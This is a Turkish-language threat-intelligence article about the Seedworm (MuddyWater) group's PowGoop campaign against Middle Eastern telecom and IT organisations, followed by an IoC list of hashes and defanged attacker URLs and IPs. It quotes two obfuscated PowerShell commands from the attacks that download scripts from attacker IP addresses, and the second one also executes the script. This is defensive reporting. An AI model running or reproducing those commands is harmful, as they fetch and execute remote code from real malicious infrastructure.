16.8 C
İstanbul
15/04/2024
Image default
HaberlerSiber Saldırılar

SeedWorm OrtaDoğu Ülkelerini Hedef Alıyor!

İran merkezli Seedworm (bilinen adıyla Muddywater) isimli grubun Orta Doğu’da yer alan kurumlara gerçekleştirdiği siber atakların sayısında son zamanlarda ciddi bir artış meydana gelmiştir. Hedef alınan ülkeler arasında Irak, İsrail, Kuveyt, Birleşik Arap Emirlikleri ve Türkiye’nin de yer aldığı bilinmektedir. Sektörel olarak ise telekom ve bilişim servisleri hedef olarak alınmıştır.

Saldırılarılarda kullanılan aracın adı, PowGoop (Dowloader.Covic) olarak tespit edilmiştir. “Scheduled Task” tarafından çalıştırılan bir powershell yardımıyla “SecurityHealthCore” isimli RegistryKey içindeki kod çalıştırılmaktadır. Bu kod ile “Backdoor.Mori” isimli arka kapı oluşturulmaktadır. Kullanılan araçlar sayesinde local ve remote portların konfigürasyonu yapılmatadır. Bu sayede enfekte olan sistemler arasında dosya transferlerinin yolu açılmaktadır. Credential çalmak amaçlı olarak “Quarks PwDump” kullanıldığı görülmüştür. Remote kod çalıştırılması için kullanılan Remadmin aracı son saldırılarda tespit edilmiştir. Bu aracın da dosyaları decode edip okumak amaçlı Powershell çalıştırdığı bilinmektedir. Örnek komutlar aşağıdaki gibidir:

  • powershell -exec bypass $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$AaA = “Do”;$AaB = ” wnloadStr”;$AaC = “ing”;$s=”$AaA$AaB$AaC”(‘http://23.95.220.166:80/download.php?k=564’);$s;”
  • $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;start-sleep 10;$s=$V.DownloadString(‘http://104.168.44.16:443/H6qy8yvXhV69mF8CgpmWwKb1oV19xMqaI’);iex($s)

PowGoop’un son dönemde gündeme gelen Thanos Ransomware ile bağlantısı olduğu ortaya çıkmıştır. Bu aracın son dönemde Türkiye, Azerbaycan, Afganistan, İsrail, Gürcistan gibi ülkelere yapılan siber saldırılarda kullanıldığı ve hükumet, teknoloji, telekom, petrol ve doğalgaz kurumlarını hedef aldığı görülmüştür.

IoC Listesi

Tespit edilen IoC değerleri aşağıdaki gibidir:

MD5VT ScoreFile Type
2e7b4ae4baa704588248b425b8e027bf9/60Powershell
c938b18056ec17ac00bf0083844eafd849/71Win32 EXE
b07d9eca8af870722939fd87e928e60336/71Win32 EXE
2c3d8366b6ed1aa5f1710d88b3adb77d20/60Powershell
ee2d1e570be5d53a5c970339991e2fd718/59Text
2e7b4ae4baa704588248b425b8e027bf9/58Powershell
01160fd8afe8f133b7a95755ead3967934/61GZIP
2534e46be860170f2237c65749af443540/63ZIP
fbe65cd962fc97192d95c40402eee59438/62Win32 DLL
5c000ef1e5c6f50cc32c6d70837bd1b27/60VBA
2e6169253a87a9d67037b1a238d4636540/61MS Excel Spreadsheet
bbe9bb47f8dd8ba97250bf7f13187ab67/60VBA
dbadc2caee829baf5531703f6741a9d347/68Win32 EXE
1d6f241798818e6fdc03015d01e1e68052/70Win32 DLL
7c12a63096a6b157564dc912e62b277344/67Win32 DLL
6983f7001de10f4d19fc2d794c3eb53452/71Win32 EXE
08f933c423a281153811c278a34248ef42/71Win32 EXE
Tablo 1: Hash Listesi

URL/IP

  • hxxp://107.173.141[.]114:443/downloadc.php?key=[REDACTED]
  • hxxp://107.173.141[.]103:443/downloadc.php?key=[REDACTED]
  • hxxp://104.168.44[.]16:443/H6qy8yvXhV69mF8CgpmWwKb1oV19xMqaI’
  • hxxp://23.95.220[.]166:80/download.php?k=564′
  • hxxp://107.175.0[.]140:443
  • 107.173.141[.]114
  • 185.183.96[.]11
  • 185.141.27[.]156
  • 23.95.220[.]166
  • 107.175.0[.]140
  • 104.168.14[.]116
  • 107.173.181[.]139
  • 104.168.44[.]16
  • 192.210.214[.]83
  • 107.173.141[.]103

Kaynak

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east

https://unit42.paloaltonetworks.com/thanos-ransomware/

Related posts

LOKIBOT ZARARLISI VE TEKNİKLERİ

Mustafa Okay Maktav

DarkIRC WebLogic Zaafiyetini Kullanıyor

Mustafa Okay Maktav

NETWALKER vs LORIEN HEALTH SERVICES

Mustafa Okay Maktav

Bu web sitesi, kullanıcı deneyimini iyileştirmek amacıyla çerezler kullanmaktadır. Kabul Et Daha Fazlası